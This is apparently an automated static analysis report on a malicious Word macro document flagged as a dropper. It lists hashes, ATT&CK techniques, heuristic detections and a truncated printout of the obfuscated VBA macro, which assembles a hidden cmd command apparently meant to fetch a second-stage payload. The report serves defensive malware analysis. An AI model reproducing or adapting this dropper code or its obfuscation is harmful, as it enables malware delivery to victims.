Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e3534bcd57938b30…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 82.6 KB
Created: 2018-08-30 23:29:00
Authoring application: Microsoft Office Word
First seen: 2018-11-13
MD5: aa3e0e2208bfe7feca1b8d5772d92d4e
SHA-1: 0c366e38ca7167bca7fd9b33df2bc66974b34d47
SHA-256: e3534bcd57938b306f7de8d37723ee645aba267022287277b2e3ed60605a0d89
Risk score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter

The file contains a VBA macro with an AutoOpen function, a common technique in malicious documents. The macro uses a Shell() call to execute a command-line utility, which appears to be designed to download and execute a second-stage payload, as indicated by the reconstructed command string 'md /V /C set 5KoY=AAC'. The ClamAV detection name 'Doc.Dropper.Sagent-6667985-0' further supports its role as a dropper.

Heuristics (6)

  • ClamAV: Doc.Dropper.Sagent-6667985-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Sagent-6667985-0
  • VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9475 bytes
SHA-256: d6897d4e5f735c83b834dc7860b86c4ad6ac4b002aabc5e9f97efea74cc86b0a

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ZrnDJfirlOumq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "bHhJoJVkjaA"
Function MRvkQL()

On _
Error _
Resume _
Next
Hour 18813 * rDzaa / sRdkb * 56990
   Hour 52298 / brvId
   Hour 98170 / 5979
   Hour 93826 / lLlIb
   Hour 58048 * PSTzAY
rnwIiB = "md" + " /" + "V/C" + Chr(4 + 1 + 3 + 5 + 21) + "^" + "s^et ^" + "5K^oY=" + "AAC"
Hour zufTJ / sPiiNJ * HHGrtK / XmIbC
   Hour rSVVX * ipdRV
LKbZwRbqKVT = "A^g^A" + "AIAAC^A" + "gA^AI" + "^AACA" + "^" + "g^AA" + "I^A^AC^" + "A^gA^A^" + "I^AAC^" + "A^gA^" + "A^I^" + "AAC^A" + "gA^Q"
Hour lYKDqL * DRvqlz
   Hour SjOWd * IoHLnw
   Hour 13847 / zZJaC
   Hour Ejhmi / Liolid
MiGGcwqb = "fA^0H^A" + "7^BA^a" + "^A^M^G^" + "A0" + "^B^Q" + "Y^AMG^A" + "^9^B" + "w^OAs" + "GA" + "hBQ^Z^A" + "IH^A^iB"
Hour ZTfBNZ * FLWcu / wLIsq / jQPVA
   Hour 85837 * XkDcFJ / 79039 * atVSIh
   Hour 83767 / KkjLBw / 45172 * JnOPT
   Hour 77815 / HcFDcV
OADXutEzck = "^wO" + "^A^w^" + "GAN^" + "BQb^AQ" + "C^A^gAQ" + "^b^" + "A^U" + "^G^A^0" + "^B^Q^" + "S"
Hour GZnwdG / 36176
   Hour 53 / rizjzQ / juVdiN * SaiSJ
zToUJvniTO = "^A" + "0C^" + "A" + "l^B^" + "w^aA8G"
Hour 8551 / GRfzK
   Hour 24529 / CUlFJk * 39266 / QjUbX
   Hour GLIALI * TzmTA / 36107 * ZPflB
uUAHjhCm = "^A2B^g" + "bAkE" + "^A^7A^Q" + "K" + "^Aw" + "GAN^B" + "Q" + "^b^A^" + "QC" + "A^gA" + "^ALA"
Hour 13143 / SwpVnj
   Hour 69242 / 3376
   Hour GjXNb * wnhaIo
TQcOjvoL = "Q^E^A^0" + "Bg^e" + "^A^QC^" + "Ao^" + "A^QZ^" + "Aw^" + "G" + "Ap^B^" + "gR" + "AQGA" + "h"
Hour NGiihh / zOPJzS
   Hour 59246 * HNVrIj
JHVRhm = "Bw" + "bA^w^G^" + "AuB^" + "w^" + "d^A8^G" + "^" + "AE^B" + "^g^L^A" + "MHA" + "tBAVAQ" + "CA^7^B" + "^Q^e^"
MRvkQL = rnwIiB + LKbZwRbqKVT + MiGGcwqb + OADXutEzck + zToUJvniTO + uUAHjhCm + TQcOjvoL + JHVRhm
   Hour pZZPv / 40997
End Function
Function umRtWz()

On _
Error _
Resume _
Next
Hour QvNzCj * jhsEO / 61338 * Cbswj
   Hour FPzcY * NnrHnw * 40361 * qLWoTo
   Hour 83245 / HIPBTa * 37186 * hHXXw
   Hour PfTFR * jIVFsG / 75331 / wwmnv
TiENB = "AI" + "^HA0^B^" + "w^e^A" + "kC" + "^Ar^" + "B^Q" + "^T" + "^AcEA^k" + "A^" + "AI" + "A^4^" + "GA^p" + "BAI^A^"
Hour 35269 / uUXuj
   Hour PrvAji * BWPhvJ
   Hour 330 * jPYKz * ITSUmh * 74136
TYuYZakJlKs = "Q^EA0^B" + "g^e" + "A^Q" + "C^A^oA" + "A^a" + "A^M^" + "G^"
Hour qYpWT / SFCJu / 82951 / 58160
   Hour 84463 / HkpKai
   Hour MwwJiW * NUBRKJ
   Hour 81561 / wTiAG * YZVJu / LFjDRI
PipfGatdikZ = "AhB" + "^QZ^A" + "^I^" + "H" + "AvBg^" + "Z" + "AsD^An" + "A" + "Q^" + "ZA^" + "g^"
Hour 18793 / FTzki / LUUCG * HKRnG
   Hour ViqRT / DDBFwL * 42049 / amYIz
   Hour 80361 * TXMPCG
JvHqUX = "H^A^l" + "^" + "BgL^AcC" + "^Ar^" + "A^w" + "Y" + "^A" + "cFAw" + "BA^" + "J" + "^A^s"
Hour 4094 / tbLJOW
   Hour 70526 / jXtfH * 58387 / GZCmk
   Hour 28709 / nijjM / 25640 / bwQcoo
VMrINN = "C^An^A" + "A^X^AcC" + "Ar^" + "A" + "^w^" + "Y^A^k^" + "G^A^s"
Hour 81619 * iCutL * 73703 * WcGjk
iTTaXWKbA = "Bg" + "Y" + "A^UHAwB" + "^g" + "^O^A" + "Y^" + "H^A^" + "uBQZ^" + "AQCA9"
Hour nwafq / wpmLh * 29355 / PvlkU
zlhazp = "^AA^b" + "^A^" + "0^EA" + "^t" + "BAJA^s" + "D^An^A^" + "A" + "MAUD^A" + "2A^" + "wJA^ACA" + "^9^" + "A"
Hour 37630 * qwuzXD
ulCQUSP = "AIA" + "MGA^" + "X^B^Ac^" + "A^" + "QC"
Hour 70925 * dtorif / aQJEYU * CGpIRX
   Hour 32444 * 42522 * vQATnI / CaJbpZ
   Hour Bilzlh * AFiNH * iXMGjV / PBKzqH
FioFZrj = "^A7A^Q^" + "K^AcCAA" + "Bw^" + "JAgC^" + "A0^B" + "Q^aAw^" + "GAwB^wU" + "A^4"
Hour 8087 * WJwOf * 33573 / HfBzLX
   Hour lmqXRb / DIrAzN
tXYTDWbJh = "C" + "^An" + "^A" + "^QSA" + "^MEA" + "^y^B^" + "g" + "^b^A8" + "CA^4"
Hour 85626 * FqzBMk / 11484 / vQHQz
   Hour FSlAa / OTVzLw / ipNFO * QSpTU
   Hour 66347 / PdjfuK / 51671 / ubDmXu
DUnhRKD = "B^Q^b" + "A" + "4CA^tB" + "w^b^A^" + "MG^A^" + "u^AA^Z^" + "AUGA^y"
umRtWz = TiENB + TYuYZakJlKs + PipfGatdikZ + JvHq
... (truncated)